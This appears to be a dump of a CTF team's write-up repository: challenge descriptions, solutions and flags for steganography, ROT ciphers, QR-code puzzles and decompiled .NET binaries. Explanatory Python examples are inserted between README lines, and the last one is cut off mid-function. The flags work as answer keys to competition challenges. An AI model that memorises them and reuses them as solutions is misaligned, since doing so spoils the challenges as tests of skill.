├── 2016
├── 3ds
│ ├── BlueScreen
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ └── README.md
│ ├── Excaliflag
│ │ ├── 1.png
│ │ ├── README.md
│ │ └── flag.png
│ ├── HALP
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── HotSun
│ │ └── README.md
│ ├── SantaWalksIntoABar
│ │ ├── README.md
│ │ ├── a5d744fb06e04bacfde2e7b713054145.zip
│ │ └── solve.py
│ └── shamecontrol
│ │ └── README.md
├── americanidiot
│ ├── cripto30
│ │ ├── README.md
│ │ ├── audio.wav
│ │ ├── audio1.png
│ │ └── flag.png
│ ├── rev20
│ │ ├── info
│ │ └── solve
│ ├── rev30
│ │ ├── info
│ │ └── solve
│ ├── steg40
│ │ ├── README.md
│ │ └── info
│ ├── web30
│ │ ├── info
│ │ └── solve
│ └── web50
│ │ ├── info
│ │ └── solve.py
├── oldreligion
│ ├── cripto10
│ │ └── README.md
│ ├── cripto20
│ │ ├── README.md
│ │ └── tabuleiro_final.png
│ ├── cripto30
│ │ ├── README.md
│ │ ├── alfabeto.gif
│ │ └── malachim.png
│ ├── for30
│ │ ├── README.md
│ │ ├── error.log
│ │ └── solver.png
│ ├── web10
│ │ ├── README.md
│ │ └── bizarro.jpg
│ └── web20
│ │ ├── README.md
│ │ ├── imagem.jpg
│ │ └── solve.py
├── seccon
│ ├── Memory Analysis
│ │ ├── README.md
│ │ └── memoryanalysis.zip
│ ├── Vigenere
│ │ ├── README.md
│ │ └── vigenere.png
│ └── voip
│ │ ├── 1.jpg
│ │ ├── 2.jpg
│ │ ├── README.MD
│ │ └── voip.pcap
├── sharifctf
│ └── rev-50
│ │ ├── README.md
│ │ └── getit
└── tarfull
│ ├── arq.zip
│ └── solve.py
├── 2017
├── 3DSCTF
│ └── cappo
│ │ ├── README.md
│ │ └── solve.py
├── AlexCTF
│ ├── README.md
│ ├── cr1
│ │ ├── 1.png
│ │ ├── README.MD
│ │ ├── solve.py
│ │ └── zero_one
│ ├── cr2
│ │ ├── README.md
│ │ └── manyTimePadAttack.py
│ ├── cr3
│ │ ├── README.md
│ │ └── cr3.py
│ ├── cr4
│ │ ├── README.md
│ │ ├── key.pvt
│ │ ├── poor_rsa.tar.gz
│ │ └── poorrsa.py
│ ├── fore1
│ │ ├── README.MD
│ │ └── fore1.core
│ └── re4
│ │ ├── README.md
│ │ └── re4.py
├── BSides
│ ├── Ancient Hop Grain Juice
│ │ └── README.MD
│ ├── Forensics-easycap
│ │ ├── README.MD
│ │ └── easycap.pcap
│ ├── MISC-Let-s play a game
│ │ └── README.MD
│ ├── MISC-Quote
│ │ └── README.MD
│ ├── MISC-The Right Cipher
│ │ └── README.MD
│ ├── NOP
│ │ └── README.MD
│ ├── Zumbo
│ │ ├── 1.png
│ │ └── README.MD
│ └── easyshell
│ │ └── README.md
├── BitsCTF
│ ├── Batman vs Joker
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── BotBot
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── Labour
│ │ └── README.MD
│ ├── README.MD
│ └── Sherlock
│ │ ├── 1.png
│ │ ├── README.MD
│ │ └── solve.py
├── BreakIn
│ ├── A present for her Birthday!
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ └── README.MD
│ ├── A weird C program
│ │ ├── README.md
│ │ └── program.cpp
│ ├── Fast and Furious
│ │ ├── README.md
│ │ ├── chromedriver
│ │ └── solve.py
│ ├── Hello world
│ │ ├── 1.png
│ │ └── README.MD
│ ├── Simple Secret - Part 1
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── README.MD
│ │ └── simple_secret1
│ └── Simple Secret - Part 2
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ ├── README.MD
│ │ └── simple_secret2
├── HackIM
│ ├── Programming
│ │ └── 1
│ │ │ ├── README.md
│ │ │ ├── abc.txt
│ │ │ ├── flag.png
│ │ │ └── solve.py
│ ├── README.md
│ └── Web
│ │ ├── 1
│ │ ├── 1.png
│ │ └── README.MD
│ │ └── 2
│ │ └── README.MD
├── README.md
├── TUCTF
│ ├── cookieHarrelson
│ │ └── README.md
│ └── gitGud
│ │ └── README.md
└── sqlinjChalls
│ ├── README.md
│ ├── level1
│ ├── README.md
│ ├── level1.php
│ └── level1.png
│ └── level2
│ ├── README.md
│ ├── flag1.png
│ ├── flag2.png
│ ├── level2.php
│ └── level2.png
├── 2018
├── EasyCTF
│ └── digging_for_soup.md
└── Pragyan
│ ├── crypto
│ └── xmen_or_the_avengers
│ │ ├── README.md
│ │ ├── info_clear.txt
│ │ ├── info_crypt.txt
│ │ └── superheroes_group_info_crypt.txt
│ └── reverse
│ └── assemble
│ └── README.md
└── README.md
/2016/3ds/BlueScreen/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/1.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/2.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/3.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/README.md:
--------------------------------------------------------------------------------
1 | # BlueScreen
2 |
3 | ## Description
4 | [PT-BR]
5 | This report-generating software was nice while it worked.
6 | I can't find the files anymore! Now I don't know whether it even downloads them.
7 | Master, solve this and as a reward I left the flag in the report.
8 |
9 | [EN]
10 | This report generator software was good until it stopped working. I can't find my files. Now I don't know why the downloads don't work.
11 | Solve the challenge and as a reward there is a flag in the report.
12 |
13 | ## Solution
14 |
15 | The challenge redirected us to a website asking to install a component, required to load the application. Our goal was to find the report and get the flag.
16 |
17 | 
18 |
19 | As we can see, in this challenge we had some .NET application to play with! :D
20 |
21 | After installing the component, we see a simple app with just one button labeled "Iniciar", but when we clicked the button an exception was shown on the screen.
22 |
23 | 
24 |
25 | With the application installed, we can open it in a .NET decompiler and read the recovered source to see if there is anything interesting. My favorite decompiler is dnSpy.
26 |
27 | Let's take a look.
28 |
29 | In this simple procedure we found this piece of code:
30 |
31 | 
32 |
33 | ```csharp
34 | webClient.DownloadFile("http://162.243.187.35:8080/relatorio.png", "!c:/relatorio.xlsx");
35 | webClient.DownloadFile("http://162.243.187.35:8080/relatorio.xlsx", "!c:/relatorio.png");
36 | ```
37 |
38 | Note the swapped names: the PNG served by the site is written to disk as relatorio.xlsx and the spreadsheet as relatorio.png, so the extensions on disk lie about the content. The PNG image is just a distraction *(we saw a lot of fake flags on this CTF, and it was fun!)*.
39 |
40 | The xlsx file had three worksheets, and in the third one, there was the flag!
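Because the two downloads are saved under each other's names, the reliable way to tell them apart is by content, not extension. The following is an added example (not code from the writeup or the challenge): it sniffs the magic bytes, lists the worksheets inside an .xlsx (a ZIP of XML parts) and pulls the string cells of each sheet, using only the standard library. The workbook is constructed in memory and the flag in it is a placeholder; the sheet names and `sheetN.xml` naming convention are assumptions for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"PK\x03\x04": "zip"}   # .xlsx is a ZIP container
M = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS = {"m": M, "r": R}
FLAG_RE = re.compile(r"3DS\{[^}]*\}")


def sniff(data):
    """Classify by leading bytes, ignoring whatever extension the file was saved with."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def sheet_names(xlsx):
    """Worksheet names in workbook order, read from xl/workbook.xml."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
    return [s.get("name") for s in wb.iterfind("m:sheets/m:sheet", NS)]


def sheet_strings(xlsx, index):
    """All string cells of worksheet number `index` (1-based). Assumes the usual
    xl/worksheets/sheetN.xml naming; a fully general reader would follow the .rels parts."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        shared = []
        if "xl/sharedStrings.xml" in z.namelist():      # Excel normally stores text here
            sst = ET.fromstring(z.read("xl/sharedStrings.xml"))
            shared = ["".join(t.text or "" for t in si.iter(f"{{{M}}}t"))
                      for si in sst.iterfind("m:si", NS)]
        ws = ET.fromstring(z.read(f"xl/worksheets/sheet{index}.xml"))
    out = []
    for c in ws.iter(f"{{{M}}}c"):
        if c.get("t") == "inlineStr":                   # text stored inside the cell itself
            out.append("".join(t.text or "" for t in c.iter(f"{{{M}}}t")))
        elif c.get("t") == "s":                         # index into the shared string table
            out.append(shared[int(c.find("m:v", NS).text)])
    return out


def find_flag(data):
    """Return (sheet name, flag) for the first sheet holding a 3DS{...} string, else None."""
    if sniff(data) != "zip":
        return None
    for i, name in enumerate(sheet_names(data), start=1):
        for s in sheet_strings(data, i):
            m = FLAG_RE.search(s)
            if m:
                return name, m.group(0)
    return None


def build_sample_xlsx():
    """Constructed three-sheet workbook; only the third sheet has a (placeholder) string cell."""
    wb = (f'<workbook xmlns="{M}" xmlns:r="{R}"><sheets>'
          '<sheet name="Vendas" sheetId="1" r:id="rId1"/>'
          '<sheet name="Custos" sheetId="2" r:id="rId2"/>'
          '<sheet name="Planilha3" sheetId="3" r:id="rId3"/></sheets></workbook>')
    empty = f'<worksheet xmlns="{M}"><sheetData/></worksheet>'
    third = (f'<worksheet xmlns="{M}"><sheetData><row r="1">'
             '<c r="A1" t="inlineStr"><is><t>3DS{placeholder_flag}</t></is></c>'
             '</row></sheetData></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", wb)
        z.writestr("xl/worksheets/sheet1.xml", empty)
        z.writestr("xl/worksheets/sheet2.xml", empty)
        z.writestr("xl/worksheets/sheet3.xml", third)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx()
    print(sniff(sample), sheet_names(sample), find_flag(sample))
```

On the real files you would call `find_flag(open("relatorio.png", "rb").read())`, since that is the one that is actually a spreadsheet.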
41 |
42 | Flag: 3DS{Windows_0/Windows_DotNet}
43 |
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/Excaliflag/1.png
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/README.md:
--------------------------------------------------------------------------------
1 | # Excaliflag
2 |
3 | ## Description
4 | [EN]
5 | Only a true hacker could pull the flag from this ground.
6 |
7 | [PT]
8 | Only a true hacker could pull the flag out of this ground.
9 |
10 | ## Solution
11 |
12 | The image shows a real flag planted in the ground and nothing else.
13 | Stepping through the bit-plane filters in [Stegsolve](https://github.com/zardus/ctf-tools/blob/master/stegsolve/install), the "Gray bits" view revealed the flag.
14 |
15 | 
16 |
17 | Flag: 3DS{Gr4b_0nly_th1s_B1ts}
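What Stegsolve's bit-plane filters do is throw away all but one bit of every pixel and display the result as black and white; data hidden in the least significant bit is invisible to the eye but jumps out in that view. The block below is an added example, not the writeup's own code: a minimal grayscale PNG writer/reader (filter type 0 only) plus an LSB embed/extract round trip. The cover image and the hidden placeholder message are constructed here and are not the challenge image.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag, body):
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_gray_png(rows):
    """Encode rows of 0..255 values as an 8-bit grayscale PNG, filter type 0 on every scanline."""
    height, width = len(rows), len(rows[0])
    raw = b"".join(b"\x00" + bytes(row) for row in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_gray_png(data):
    """Decode the subset written above: walk chunks, inflate IDAT, strip the per-row filter byte."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, idat = len(PNG_SIG), b""
    width = height = None
    while pos < len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 0):
                raise ValueError("example handles 8-bit grayscale only")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length                      # length + tag + body + crc
    raw = zlib.decompress(idat)
    stride = width + 1
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError("only filter type 0 is implemented here")
        rows.append(list(line[1:]))
    return rows


def bit_plane(rows, bit):
    """Keep only one bit of every pixel and stretch it to black/white, as Stegsolve displays it."""
    return [[255 if (p >> bit) & 1 else 0 for p in row] for row in rows]


def embed_lsb(rows, message):
    """Write the message bits, MSB first, into the least significant bit of consecutive pixels."""
    bits = [(b >> (7 - i)) & 1 for b in message for i in range(8)]
    if len(bits) > sum(len(r) for r in rows):
        raise ValueError("message does not fit in the cover image")
    out = [row[:] for row in rows]
    k = 0
    for row in out:
        for x in range(len(row)):
            if k == len(bits):
                return out
            row[x] = (row[x] & 0xFE) | bits[k]
            k += 1
    return out


def bytes_from_plane(plane, nbytes):
    """Reassemble bytes from a 0/255 bit-plane image, row-major, MSB first."""
    bits = [1 if p else 0 for row in plane for p in row]
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, nbytes * 8, 8))


def demo(message=b"3DS{placeholder}"):
    """Round trip: gradient cover -> LSB embed -> PNG bytes -> parse -> plane 0 -> message."""
    cover = [[(x * 16 + y) & 0xFF for x in range(16)] for y in range(16)]   # constructed cover
    png = write_gray_png(embed_lsb(cover, message))
    rows = read_gray_png(png)
    return bytes_from_plane(bit_plane(rows, 0), len(message))


if __name__ == "__main__":
    print(demo())
```

For a real PNG you would use a full decoder (Pillow's `Image.open(...).convert("L")`) and then feed its pixels to `bit_plane`; the extraction logic is the same.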
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/Excaliflag/flag.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/1.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/2.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/README.MD
--------------------------------------------------------------------------------
/2016/3ds/HotSun/README.md:
--------------------------------------------------------------------------------
1 | # Hot Sun?
2 |
3 | ~~~~
4 | [EN]
5 | Surfing the Shallowweb, we have discovered a new algorithm that promises to be the newest substitution cipher. The algorithm to encrypt works as follows: the user provides the text to be encrypted and a number N. Initially, the algorithm shifts all letters one position to the right (e.g. 'A' turns into 'B'). With this result, in the next step, the algorithm shifts the text two positions to the right. And with the text from the previous output, it repeats the shift procedure until N. Your task is quite simple: given an encrypted flag and a number N, discover the flag.
6 | Encrypted flag: 3RG{hv1g_f0h_1g_b0h_g0_V0h} N: 11
7 |
8 | [PT-BR]
9 | Researching on the shallowweb, we discovered a new algorithm that promises to be the newest substitution cipher. The encryption algorithm works like this: the user provides the text to be encrypted and a number N. Initially, the algorithm shifts all letters one position to the right ('A', for example, becomes 'B'). With that output, in the next step, the algorithm shifts the new text two positions to the right. And with the previous output, it repeats the shifting procedure up to N. Your task is quite simple: given the encrypted flag and a number N, find the flag.
10 | Flag cifrada: 3RG{hv1g_f0h_1g_b0h_g0_V0h}
11 | N: 11
12 | ~~~~
13 |
14 | This is a very simple challenge about ROTs. There are two approaches: either you follow what is going on, ROT by ROT, or you just solve it directly.
15 |
16 | We relied on a pretty obvious principle: the composition of ROTs is just another ROT. If you rotate *x* positions to the right, then *y* to the left, then right again and so on, all of it is equivalent to a single *ROT Z*, because the shifts simply add modulo 26 (the rotations form a group under composition).
17 |
18 | Since the flag must start with *3DS*, we know that *R* maps to *D*, so the net shift is *ord('R') - ord('D') == 14*: a single ROT14 to the right, which matches the total shift 1 + 2 + ... + 11 = 66 ≡ 14 (mod 26). Undoing it gives 3DS{th1s_r0t_1s_n0t_s0_H0t}.
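To make the argument above concrete, here is an added example (not from the original writeup) that implements the challenge's iterated shift as described, the closed-form shortcut (ROT1 through ROTn collapse to a single ROT by n(n+1)/2 mod 26), and the known-plaintext trick of reading the net shift off the `3DS` prefix. It is pure Python with no assumptions beyond the ciphertext and N given in the description.

```python
def rot(text, k):
    """Shift letters k positions to the right (mod 26), preserving case; other characters pass through."""
    out = []
    for ch in text:
        if "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + k) % 26 + 65))
        elif "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + k) % 26 + 97))
        else:
            out.append(ch)
    return "".join(out)


def encrypt_iterated(text, n):
    """The challenge algorithm literally: ROT1, then ROT2 on that result, ... up to ROTn."""
    for k in range(1, n + 1):
        text = rot(text, k)
    return text


def net_shift(n):
    """Composing ROT1..ROTn is one ROT by the triangular number 1+2+...+n, reduced mod 26."""
    return (n * (n + 1) // 2) % 26


def decrypt(ciphertext, n):
    """Undo the whole chain in one step using the closed form."""
    return rot(ciphertext, -net_shift(n))


def recover_shift(ciphertext, known_prefix):
    """Known-plaintext shortcut from the writeup: the first letter pair gives the shift directly."""
    for c, p in zip(ciphertext, known_prefix):
        if c.isalpha() and p.isalpha():
            return (ord(c.lower()) - ord(p.lower())) % 26
    raise ValueError("no alphabetic character in the common prefix")


CIPHERTEXT = "3RG{hv1g_f0h_1g_b0h_g0_V0h}"
N = 11

if __name__ == "__main__":
    print("net shift:", net_shift(N), "from prefix:", recover_shift(CIPHERTEXT, "3DS"))
    print(decrypt(CIPHERTEXT, N))
```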
19 |
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/README.md:
--------------------------------------------------------------------------------
1 | # Santa Walks Into a Bar
2 |
3 | ~~~~
4 | [EN]
5 | Santa walks into a bar and forms a friendship bond with you.
6 | After some shots, he tells you his secret for delivering all the gifts on Christmas: he has a magical linked list that tells him the next kiddie to visit.
7 | At the end of the night he goes away and leaves behind his wallet and the bag with the list of gifts to deliver. Try to find out whether you will receive something.
8 |
9 | [PT-BR]
10 | Santa walks into a bar and strikes up a friendship with you.
11 | After a few drinks, he tells you his secret for delivering all the Christmas presents: he has a linked list that tells him which child he must visit next. At the end of the night he left and forgot his wallet and the bag with the list of presents to deliver. Try to find out whether you will receive anything.
12 | ~~~~
13 |
14 | The given file is a *.zip* with lots of *.png* files inside. Each file is a QR code that decodes to a short message naming a child. Our goal is to find the one addressed to us.
15 |
16 | Although the challenge mentions a linked list, there is no real need to walk it. Each decoded QR code points to another file name, so we could simply follow the nodes of the list. However, there are several linked lists mixed together in this folder: if you start from an arbitrary node, say the first file in alphabetical order, you may end up on a list whose last node reads "Fail!".
17 |
18 | Instead of trying every list, we simply decoded every file in the folder in sequence and, for each node addressed to "you", followed its pointer one step. Still a linked list, in a way :)
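For completeness, here is how walking the lists properly looks, as an added example that is not part of the original writeup. It works on the decoded QR texts (a dict of node name to message, constructed below as a stand-in for the real folder; the hashes and messages are placeholders), finds the heads of every list, follows pointers with cycle detection, and reports the list whose terminal node mentions a gift. Decoding the PNGs themselves would still be done with qrtools as in the script.

```python
import re

# node name -> decoded QR text (constructed sample; the real data came from qrtools)
NODES = {
    "aaa1": "Next kiddie is Ana in bbb2",
    "bbb2": "A kid called Bob in ccc3",
    "ccc3": "Fail!",
    "ddd4": "A child in you in eee5",
    "eee5": "Wrong!",
    "fff6": "I almost forgot you in abc7",
    "abc7": "Y0ur gift is in goo.gl/placeholder",
    "bcd8": "Loop in cde9",          # a two-node cycle: no head, never terminates
    "cde9": "Loop back in bcd8",
}

# a pointer is a trailing hex token after the word "in"; a URL or "Fail!" is not one
POINTER = re.compile(r"\bin\s+([0-9a-f]+)\s*$")


def next_node(text):
    m = POINTER.search(text)
    return m.group(1) if m else None


def heads(nodes):
    """Nodes that nothing points to: the starts of the lists."""
    targets = {next_node(t) for t in nodes.values()} - {None}
    return sorted(n for n in nodes if n not in targets)


def walk(nodes, start):
    """Follow pointers from start. Returns (path, cycle_detected)."""
    path, seen = [], set()
    cur = start
    while cur is not None and cur in nodes:
        if cur in seen:
            return path, True           # pointer back into the path: a cycle
        seen.add(cur)
        path.append(cur)
        cur = next_node(nodes[cur])
    return path, False


def find_gift(nodes):
    """Walk every list (heads first, then any nodes left over, which can only be pure cycles)
    and return (head, terminal, terminal_text) for the list that ends in a gift."""
    visited = set()
    for start in heads(nodes) + sorted(nodes):
        if start in visited:
            continue
        path, cycle = walk(nodes, start)
        visited.update(path)
        last = path[-1]
        if not cycle and "gift" in nodes[last].lower():
            return start, last, nodes[last]
    return None


if __name__ == "__main__":
    print("heads:", heads(NODES))
    print("gift list:", find_gift(NODES))
    print("cycle from bcd8:", walk(NODES, "bcd8"))
```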
19 |
20 | This silly script did the trick in a few minutes:
21 |
22 | ~~~~
23 | import os
24 | import qrtools
25 |
26 | qr = qrtools.QR()
27 | for f in sorted(os.listdir(".")):
28 |     if not f.endswith(".png"):   # skip solve.py, the zip and anything else that is not a QR image
29 |         continue
30 |     qr.decode(f)
31 |     if "you" in qr.data:
32 |         print("File content >> %s" % qr.data)
33 |         # the last word of the message names the next node (file name without extension)
34 |         img = qr.data.rsplit(' ', 1)[1] + ".png"
35 |         qr.decode(img)
36 |         print(" " + img + " >> " + qr.data)
36 | ~~~~
37 |
38 | And the output:
39 |
40 | ~~~~
41 | File content >> Next kiddie is you in 6f0600da67c1870c157d1f61e0c58091
42 | 6f0600da67c1870c157d1f61e0c58091.png >> Yu u no following right?
43 | File content >> A child in you in ed7b0eaaf64c9bf6c90299f6cbe6d4e1
44 | ed7b0eaaf64c9bf6c90299f6cbe6d4e1.png >> Fail
45 | File content >> A kid called you in dec1eadad9056c9ebde333c90cfd3769
46 | dec1eadad9056c9ebde333c90cfd3769.png >> Ops!
47 | File content >> A kid called you in 0a6d1cb51e224c3ad799fc91c9c5f68e
48 | 0a6d1cb51e224c3ad799fc91c9c5f68e.png >> So wrong!
49 | File content >> I almost forgot you in 3ab3b4b87d57315315cbb0259a262177
50 | 3ab3b4b87d57315315cbb0259a262177.png >> Y0ur gift is in goo.gl/wFGwqO inugky3leb2gqzjanruw42yk
51 | File content >> A child in you in 6fece9e2a5b49c07cdd7e8c3235ab724
52 | 6fece9e2a5b49c07cdd7e8c3235ab724.png >> Wrong!
53 | ~~~~
54 |
55 | There you go! Just check the address *https://goo.gl/wFGwqO* to get the flag:
56 |
57 | 3DS{I_h0p3_th4t_Y0u_d1d_n0t_h4v3_ch4ck3d_OnE_by_0n3}
58 |
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/a5d744fb06e04bacfde2e7b713054145.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/SantaWalksIntoABar/a5d744fb06e04bacfde2e7b713054145.zip
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/solve.py:
--------------------------------------------------------------------------------
1 | import os
2 | import qrtools
3 |
4 | qr = qrtools.QR()
5 | for f in sorted(os.listdir(".")):
6 |     if not f.endswith(".png"):   # skip this script, the zip and anything else that is not a QR image
7 |         continue
8 |     qr.decode(f)
9 |     if "you" in qr.data:
10 |         print("File content >> %s" % qr.data)
11 |         # the last word of the message names the next node (file name without extension)
12 |         img = qr.data.rsplit(' ', 1)[1] + ".png"
13 |         qr.decode(img)
14 |         print(" " + img + " >> " + qr.data)
--------------------------------------------------------------------------------
/2016/3ds/shamecontrol/README.md:
--------------------------------------------------------------------------------
1 | # shamecontrol
2 |
3 | ## Description
4 | [EN]
5 | What if it is a Windows .exe, can you still do it?
6 | Flag format: "3DS{flag}"
7 |
8 | [PT-BR]
9 | And if it is a Windows binary, can you still do it?
10 | Flag in the format: "3DS{flag}"
11 |
12 | ## Solution
13 |
14 | Another .NET application, but this time it printed nothing when we ran it from the console. So let's read the decompiled code:
15 |
16 | ```csharp
17 | namespace ConsoleApplication2
18 | {
19 |     // Token: 0x02000002 RID: 2
20 |     internal class Program
21 |     {
22 |         // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
23 |         private static void Main(string[] args)
24 |         {
25 |             string text = "40";
26 |             RegistryKey currentUser = Registry.CurrentUser;
27 |             if (Debugger.IsAttached)
28 |             {
29 |                 Console.WriteLine("3DS{2}j{0}t{0}v{0}c{0}b{0}nd{1}{3}", new object[]
30 |                 {
31 |                     text[1],
32 |                     text[0],
33 |                     "{",
34 |                     "}"
35 |                 });
36 |             }
37 |             RegistryKey registryKey = currentUser.OpenSubKey("parangaricutirimirruaro");
38 |             if (registryKey != null)
39 |             {
40 |                 Console.WriteLine("3DS{2}j{0}t{0}v{0}c{0}b{0}nd{1}{3}", new object[]
41 |                 {
42 |                     text[0],
43 |                     text[1],
44 |                     "{",
45 |                     "}"
46 |                 });
47 |                 registryKey.Close();
48 |             }
49 |             currentUser.Close();
50 |         }
51 |     }
52 | }
53 | ```
54 |
55 | Substituting the format arguments into the string is enough to get the flag, but note the debugger check in the code:
56 |
57 | ```csharp
58 | if (Debugger.IsAttached)
59 | ```
60 |
61 | With a debugger attached the two arguments are swapped and the program prints a fake flag: 3DS{j0t0v0c0b0nd4}
62 |
63 | Strings are zero-indexed, so in the registry branch (taken only when the key HKCU\parangaricutirimirruaro exists, which is why a plain run printed nothing) the arguments are:
64 | ```
65 | text[0] = 4
66 | text[1] = 0
67 | ```
68 |
69 | Flag: 3DS{j4t4v4c4b4nd0}
70 |
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/README.md:
--------------------------------------------------------------------------------
1 | ### cripto30
2 |
3 | The downloaded file is a .wav audio of US president Barack Obama announcing the death of Osama Bin Laden. Apparently nothing is wrong with the file, but with a little patience we reach the last seconds of the audio, where a noise can be heard, as if the flag were talking to us :)
4 |
5 | Opening it in Audacity, we can clearly see the noise starting at 1:15, but it doesn't seem to say much.
6 |
7 | 
8 |
9 | Since the challenge mentioned two techniques, including a crypto one, I thought the noise could be Morse code, binary, or something of the kind. As I found none of that, I moved on to other analyses of the waveform.
10 |
11 | Audacity lets us view the audio as a spectrogram instead of the waveform. Just select that option from the arrow to the left of the track.
12 |
13 | 
14 |
15 | There it is! Clearly our encrypted flag. Judging by the format it is very likely a simple substitution cipher such as Caesar. Testing online [here](http://www.xarg.org/tools/caesar-cipher/) we see it is indeed a ROT23.
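Why does the spectrogram show what the waveform hides? A narrow-band signal added on top of speech barely changes the amplitude envelope, but it concentrates energy in one frequency bin. The block below is an added example, not from the original writeup: it builds a small WAV with the standard library (a low tone throughout, plus a high tone only in the final stretch, standing in for the hidden signal), computes a Hann-windowed FFT per frame, and reports the frames in which the high bin stands far above the column's median. The audio is constructed here and is not the challenge file.

```python
import cmath
import io
import math
import struct
import wave

RATE = 8000           # samples per second
FRAME = 256           # samples per spectrogram column (bin width = RATE / FRAME = 31.25 Hz)


def make_wav(seconds=1.0, tone_hz=3000.0, tone_from=0.5):
    """Mono 16-bit WAV: a 200 Hz carrier everywhere, tone_hz added only after tone_from seconds."""
    samples = []
    for i in range(int(seconds * RATE)):
        t = i / RATE
        v = 0.4 * math.sin(2 * math.pi * 200 * t)
        if t >= tone_from:
            v += 0.2 * math.sin(2 * math.pi * tone_hz * t)
        samples.append(int(v * 32767))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(RATE)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def read_wav(data):
    """Return (sample rate, list of int16 samples) for a mono 16-bit WAV."""
    with wave.open(io.BytesIO(data), "rb") as w:
        n = w.getnframes()
        return w.getframerate(), list(struct.unpack("<%dh" % n, w.readframes(n)))


def fft(x):
    """Radix-2 Cooley-Tukey; len(x) must be a power of two."""
    n = len(x)
    if n == 1:
        return x
    even, odd = fft(x[0::2]), fft(x[1::2])
    out = [0] * n
    for k in range(n // 2):
        tw = cmath.exp(-2j * math.pi * k / n) * odd[k]
        out[k] = even[k] + tw
        out[k + n // 2] = even[k] - tw
    return out


def spectrogram(samples, frame=FRAME):
    """One magnitude spectrum (frame//2 bins) per non-overlapping, Hann-windowed frame."""
    cols = []
    for start in range(0, len(samples) - frame + 1, frame):
        chunk = samples[start:start + frame]
        window = [s * (0.5 - 0.5 * math.cos(2 * math.pi * i / frame)) for i, s in enumerate(chunk)]
        cols.append([abs(c) for c in fft(window)[:frame // 2]])
    return cols


def frames_with_tone(cols, rate, hz, frame=FRAME, ratio=10.0):
    """Indices of frames where the bin nearest hz is `ratio` times above that column's median."""
    b = round(hz * frame / rate)
    hits = []
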